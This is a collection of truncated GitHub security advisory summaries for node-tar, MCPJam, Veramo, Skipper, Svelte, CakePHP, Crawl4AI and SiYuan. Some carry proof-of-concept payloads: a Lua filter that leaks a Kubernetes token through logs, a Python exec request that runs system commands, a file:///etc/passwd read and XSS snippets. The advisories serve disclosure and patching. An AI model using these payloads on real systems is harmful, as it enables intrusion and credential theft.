Source
ghsa
### Summary The `node-tar` library (`<= 7.5.2`) fails to sanitize the `linkpath` of `Link` (hardlink) and `SymbolicLink` entries when `preservePaths` is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to **Arbitrary File Overwrite** via hardlinks and **Symlink Poisoning** via absolute symlink targets. ### Details The vulnerability exists in `src/unpack.ts` within the `[HARDLINK]` and `[SYMLINK]` methods. **1. Hardlink Escape (Arbitrary File Overwrite)** The extraction logic uses `path.resolve(this.cwd, entry.linkpath)` to determine the hardlink target. Standard Node.js behavior dictates that if the second argument (`entry.linkpath`) is an **absolute path**, `path.resolve` ignores the first argument (`this.cwd`) entirely and returns the absolute path. The library fails to validate that this resolved target remains within the extraction root. A malicious archive can create a hardlink to a sensitive file on the h...
### Summary MCPJam inspector is the local-first development platform for MCP servers. The Latest version Versions 1.4.2 and earlier are vulnerable to remote code execution (RCE) vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE. This vulnerability is similar to CVE-2025-49596, but more severe. While CVE-2025-49596 requires tricking a user into clicking a malicious link, this vulnerability is exploitable with no user interaction. Since MCPJam inspector by default listens on 0.0.0.0 instead of 127.0.0.1, an attacker can trigger the RCE remotely via a simple HTTP request. ### Details MCPJam inspector binds to `0.0.0.0` making its HTTP APIs remotely reachable. ``` TypeScript const server = serve({ fetch: app.fetch, port: SERVER_PORT, hostname: "0.0.0.0", }); ``` The `/api/mcp/connect` API, which is intended for connecting to MCP servers, becomes an open entry point for unauthorized requests. Whe...
### Summary Originally reported as an issue #2613 but should be elevated to a security issue as the ExecutionContext is often used to pass authentication tokens from incoming requests to services loading data from backend APIs. ### Details When 2 or more parallel requests are made which trigger the same service, the context of the requests is mixed up in the service when the context is injected via `@ExecutionContext()` ### PoC In a new project/folder, create and install the following `package.json`: ```json { "name": "GHSA-53wg-r69p-v3r7", "scripts": { "test": "jest" }, "dependencies": { "graphql-modules": "2.4.0" }, "devDependencies": { "@babel/plugin-proposal-class-properties": "^7.18.6", "@babel/plugin-proposal-decorators": "^7.28.6", "babel-plugin-parameter-decorator": "^1.0.16", "jest": "^29.7.0", "reflect-metadata": "^0.2.2" } } ``` with: ``` npm i ``` configure `babel.config.json` using: ```json { "plugins": [ ["@babel/plu...
## Summary An SQL injection vulnerability exists in the `@veramo/data-store` package that allows any authenticated user to execute arbitrary SQL queries against the database. The vulnerability is caused by insufficient validation of the `column` parameter in the `order` array of query requests. ## Details `packages/data-store/src/data-store-orm.ts` (lines 416-434) The vulnerability exists in the `decorateQB()` function which processes query ordering parameters: ```typescript function decorateQB( qb: SelectQueryBuilder<any>, tableName: string, input: FindArgs<any>, ): SelectQueryBuilder<any> { if (input?.skip) qb = qb.offset(input.skip) if (input?.take) qb = qb.limit(input.take) if (input?.order) { for (const item of input.order) { qb = qb.addSelect( qb.connection.driver.escape(tableName) + '.' + qb.connection.driver.escape(item.column), item.column, ) qb = qb.orderBy(qb.connection.driver.escape(item.column), item.direction) } ...
### Impact Arbitrary code execution through [lua filters](https://opensource.zalando.com/skipper/reference/scripts/). The default skipper configuration before v0.23 was `-lua-sources=inline,file`. The problem starts if untrusted users can create lua filters, because of `-lua-sources=inline` , for example through a Kubernetes Ingress resource. The configuration `inline` allows these user to create a script that is able to read the filesystem accessible to the skipper process and if the user has access to read the logs they an read skipper secrets. Kubernetes example (vulnerability is not limited to Kubernetes) ```lua function request(ctx, params) local file = io.open('/var/run/secrets/kubernetes.io/serviceaccount/token', 'r') if file then local token = file:read('*all') file:close() error('[EXFIL] ' .. token) -- Exfiltrate via error logs end end ``` ### Patches https://github.com/zalando/skipper/releases/tag/v0.23.0 disables Lua by default. ### Workarounds You...
### Summary A server-side rendered `<textarea>` with two-way bound value does not have its value correctly escaped in the rendered HTML. ### Details In SSR, `<textarea bind:value={...}>` does not have its value escaped when it is rendered into the HTML as `<textarea>...</textarea>`. ### PoC Put this in a server-side-rendered Svelte component: ``` <script> let value = `test'"></textarea><script` + `>alert('BIM');</sc` + `ript>`; </script> <textarea bind:value /> ``` ### Impact - Only affects SSR - Needs a `<textarea bind:value>` filled by user content via two-way binding
### Impact The `PaginatorHelper::limitControl()` method has a cross-site-scripting vulnerability via query string parameter manipulation. ### Patches This issue has been fixed in 5.2.12 and 5.3.1 ### Workarounds If you are unable to upgrade, you should avoid using `Paginator::limitControl()` until you can upgrade.
A critical remote code execution vulnerability exists in the Crawl4AI Docker API deployment. The `/crawl` endpoint accepts a `hooks` parameter containing Python code that is executed using `exec()`. The `__import__` builtin was included in the allowed builtins, allowing attackers to import arbitrary modules and execute system commands. **Attack Vector:** ```json POST /crawl { "urls": ["https://example.com"], "hooks": { "code": { "on_page_context_created": "async def hook(page, context, **kwargs):\n __import__('os').system('malicious_command')\n return page" } } } ``` ### Impact An unauthenticated attacker can: - Execute arbitrary system commands - Read/write files on the server - Exfiltrate sensitive data (environment variables, API keys) - Pivot to internal network services - Completely compromise the server ### Mitigation 1. **Upgrade to v0.8.0** (recommended) 2. If unable to upgrade immediately: - Disable the Docker API - Block `/crawl` endpoint ...
A local file inclusion vulnerability exists in the Crawl4AI Docker API. The /execute_js, /screenshot, /pdf, and /html endpoints accept file:// URLs, allowing attackers to read arbitrary files from the server filesystem. Attack Vector: ```json POST /execute_js { "url": "file:///etc/passwd", "scripts": ["document.body.innerText"] } ``` Impact An unauthenticated attacker can: - Read sensitive files (/etc/passwd, /etc/shadow, application configs) - Access environment variables via /proc/self/environ - Discover internal application structure - Potentially read credentials and API keys Workarounds 1. Disable the Docker API 2. Add authentication to the API 3. Use network-level filtering
### Summary A Stored Cross-Site Scripting (XSS) vulnerability exists in SiYuan Note. The application does not sanitize uploaded SVG files. If a user uploads and views a malicious SVG file (e.g., imported from an untrusted source), arbitrary JavaScript code is executed in the context of their authenticated session. ### Details The application allows authenticated users to upload files, including .svg images, without sanitizing the input to remove embedded JavaScript code (such as <script> tags or event handlers). ### PoC 1. Create a new "Daily note" in the workspace. <img width="1287" height="572" alt="image" src="https://github.com/user-attachments/assets/3a4389b9-695d-4e1b-94dc-72efdb047aa9" /> 2. Create a file named test.svg with malicious JavaScript inside: ``` <svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" viewBox="0 0 124 124" fill="none"> <rect width="124" height="124" rx="24" fill="red"/> <script type="text/javascript"> alert(window.origin); <...